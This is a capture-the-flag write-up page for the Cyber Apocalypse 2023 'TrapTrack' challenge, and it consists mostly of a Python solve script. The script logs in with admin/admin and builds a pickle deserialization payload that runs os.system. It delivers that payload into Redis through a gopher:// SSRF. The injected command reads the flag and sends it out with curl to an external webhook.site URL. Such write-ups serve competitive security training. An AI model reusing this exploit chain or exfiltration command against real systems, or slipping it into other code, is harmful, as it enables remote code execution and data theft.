CTFtime.org / Cyber Apocalypse 2023: The Cursed Mission / TrapTrack / Writeup

Solve Script:
```python
import requests
import pickle
import base64

def generate_payload(cmd):
class PickleRce(object):
def __reduce__(self):
import os

return os.system, (cmd,)

payload = pickle.dumps(PickleRce())
return payload

base = "http://161.35.168.118:32265"

r = requests.post(base + "/api/login", json={"username": "admin", "password": "admin"})
print(f"{r.cookies}")

picklePayload = base64.b64encode(
generate_payload(
"/readflag > /tmp/flag.txt; curl -d @/tmp/flag.txt https://webhook.site/e4e7d72a-5f56-4bee-89eb-f300c2147ae5"
)
)
print(f"{picklePayload=}")

ssrf = "gopher://127.0.0.1:6379/_" + requests.utils.quote(f"HSET jobs 100 {picklePayload.decode()}\nSAVE")

# print(f"{ssrf=}")
r = requests.post(base + "/api/tracks/add", json={"trapName": "SJP", "trapURL": ssrf}, cookies=r.cookies)
print(r.text)
```

tl;dr; Use SSRF to inject a pickle-rce into redis

Full writeup video:
[https://www.youtube.com/watch?v=hyUQ2_KLo84](https://www.youtube.com/watch?v=hyUQ2_KLo84)

Original writeup (https://www.youtube.com/watch?v=hyUQ2_KLo84).

TrapTrack

Comments

Sign in with